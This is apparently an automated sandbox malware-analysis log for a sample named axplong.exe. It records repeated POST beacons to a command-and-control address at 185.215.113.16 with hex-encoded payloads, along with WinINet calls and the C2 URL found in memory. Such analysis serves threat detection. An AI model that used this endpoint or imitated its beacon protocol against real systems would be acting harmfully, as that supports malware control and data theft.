                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F8BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_00F8BD60
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000006.00000002.2996262320.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php$
                    Source: axplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)G
                    Source: axplong.exe, 00000006.00000002.2996262320.00000000015E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php.
                    Source: axplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php:V
                    Source: axplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php;
                    Source: axplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpB
                    Source: axplong.exe, 00000006.00000002.2996262320.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                    Source: axplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpf
                    Source: axplong.exe, 00000006.00000002.2996262320.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpg
                    Source: axplong.exe, 00000006.00000002.2996262320.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
